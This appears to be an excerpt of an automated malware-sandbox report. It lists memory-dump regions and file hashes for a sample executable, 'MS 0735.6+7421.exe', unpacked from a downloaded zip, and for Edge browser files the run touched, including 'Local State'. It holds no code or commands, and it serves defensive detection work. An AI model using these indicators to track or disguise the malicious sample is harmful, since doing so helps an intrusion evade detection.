memory/2716-960-0x00007FFA8D120000-0x00007FFA8D137000-memory.dmp
memory/2716-961-0x00007FFA8BED0000-0x00007FFA8BEE1000-memory.dmp
memory/2716-962-0x00007FFA884C0000-0x00007FFA884D7000-memory.dmp
memory/2716-964-0x00007FFA88450000-0x00007FFA8846D000-memory.dmp
memory/2716-965-0x00007FFA88430000-0x00007FFA88441000-memory.dmp
memory/2716-966-0x00007FFA7E630000-0x00007FFA7E830000-memory.dmp
memory/2716-963-0x00007FFA88470000-0x00007FFA88481000-memory.dmp
memory/2716-968-0x00007FFA88400000-0x00007FFA88421000-memory.dmp
memory/2716-969-0x00007FFA87ED0000-0x00007FFA87EE8000-memory.dmp
memory/2716-967-0x00007FFA87EF0000-0x00007FFA87F2F000-memory.dmp
memory/2716-959-0x00007FFA8D310000-0x00007FFA8D328000-memory.dmp
memory/2716-972-0x00007FFA87C20000-0x00007FFA87C31000-memory.dmp
memory/2716-973-0x00007FFA87C00000-0x00007FFA87C11000-memory.dmp
memory/2716-974-0x00007FFA87BE0000-0x00007FFA87BFB000-memory.dmp
memory/2716-975-0x00007FFA87BC0000-0x00007FFA87BD1000-memory.dmp
memory/2716-977-0x00007FFA87B50000-0x00007FFA87B80000-memory.dmp
memory/2716-978-0x00007FFA87A00000-0x00007FFA87A67000-memory.dmp
memory/2716-976-0x00007FFA87B80000-0x00007FFA87B98000-memory.dmp
memory/2716-979-0x00007FFA80400000-0x00007FFA8046F000-memory.dmp
memory/2716-980-0x00007FFA87AD0000-0x00007FFA87AE1000-memory.dmp
memory/2716-981-0x00007FFA7F640000-0x00007FFA7F696000-memory.dmp
memory/2716-984-0x00007FFA7DA20000-0x00007FFA7DB90000-memory.dmp
memory/2716-985-0x00007FFA87A90000-0x00007FFA87AA2000-memory.dmp
memory/2716-986-0x00007FFA86E70000-0x00007FFA86EB2000-memory.dmp
memory/2716-989-0x00007FFA7F5E0000-0x00007FFA7F637000-memory.dmp
memory/2716-990-0x00007FFA7D660000-0x00007FFA7D8AB000-memory.dmp
memory/2716-988-0x00007FFA7D8B0000-0x00007FFA7DA1B000-memory.dmp
memory/2716-987-0x00007FFA80250000-0x00007FFA8029C000-memory.dmp
memory/2716-983-0x00007FFA87AB0000-0x00007FFA87AC7000-memory.dmp
memory/2716-982-0x00007FFA7DB90000-0x00007FFA7DD08000-memory.dmp
memory/2716-971-0x00007FFA87C40000-0x00007FFA87C51000-memory.dmp
memory/2716-970-0x00007FFA682F0000-0x00007FFA6939B000-memory.dmp
memory/2716-991-0x00007FFA5B080000-0x00007FFA5C830000-memory.dmp
memory/2716-994-0x00007FFA8D210000-0x00007FFA8D220000-memory.dmp
memory/2716-995-0x00007FFA87870000-0x00007FFA8789F000-memory.dmp
memory/2716-996-0x00007FFA879E0000-0x00007FFA879F1000-memory.dmp
memory/2716-997-0x00007FFA87580000-0x00007FFA87596000-memory.dmp
memory/2716-998-0x00007FFA7EC40000-0x00007FFA7ED05000-memory.dmp
memory/2260-1036-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/5024-1038-0x0000000000400000-0x0000000001DFD000-memory.dmp
memory/5324-1116-0x0000000000400000-0x0000000001DFD000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | f434b4b846dcc34633cfde9af564377d |
| SHA1 | 156c43c629e10361334d874211f5eeaa43b48d89 |
| SHA256 | 99ffabdced11c9cc2d7dd259230f4530267e0b59a762e56d134844700e13bbbf |
| SHA512 | 27bc65e062ee803bdb78389a0c94fdfe34440a1960e204cf86ed9286929245f9004330f48b8b4eb7dd6c1ed45abb21f0fc7f39cd70961635cc4d866b89d7f1cc |
C:\Users\Admin\Downloads\MS 0735.6+7421.zip
| MD5 | 1b3cf59e94f7d599ed2d54c1f82acb5a |
| SHA1 | 10d84b9096c92331106212af9a88cc7f8119c458 |
| SHA256 | 57c3e5002750b9da9dbf7526a1288bbd84f339fadc16f828ef20d1889c51e483 |
| SHA512 | 113328d190125c1dd0f7b5dc323a68c41f5a98c1afbec51e414c5f2776097bb1daf44af9aa58acb221c82c11e68b580f414ead1cf8184caf28da259793555a45 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3c3918d5118ea6d0367f78b0d3ad2e42 |
| SHA1 | 789a74dfe3b7b5388da591ffb748fdcaad44bede |
| SHA256 | c3e096e1577099d2eb4652303d9285811de4701f311485ffd5731522f611f07e |
| SHA512 | 27e87f5f002a25a1f19c10ec3ce7c53a4960fbc83217ecb9a389dabc6c3176445a7d2166bd4620f97528a10136083f0696e8380f13b6f13765fd296e20b3bffc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 092538da5a2f6e3f4032b80c90cc81b2 |
| SHA1 | b59fe79254bd0964a9a09ac604d28526a07c5f2e |
| SHA256 | 5b3b63eb84117d7a61a408a5f76e911fe17fdebf05a5271aa75a520be22d6d7e |
| SHA512 | 93e3610d3bac725a27463a833e90d65ca99b064093969bf066ca86053adaf3517d4816d078d2f885a22c5fa727601c99b1014f735bb03dce1c8d037131157c95 |
C:\Users\Admin\AppData\Local\Temp\Temp1_MS 0735.6+7421.zip\MS 0735.6+7421.exe
| MD5 | b13850aceaf6c1ee66c61bc94135fa25 |
| SHA1 | f23280f6bec2f097ddf77b97bb19b643a2c5a80b |
| SHA256 | ae2a43a7d58e9766fac59032ba1ecf1df7866ce5bc09b879c6bb111036789ed2 |
| SHA512 | d4344edb6e4a460e162169e5621fbf851538c70c6489cca034d1600c3a9a677e8cfa0607e464ea8de3a22066928f540833bc10bf18ae3b1ec7e9147c0d3a897b |
memory/2212-1383-0x00007FFA73560000-0x00007FFA74021000-memory.dmp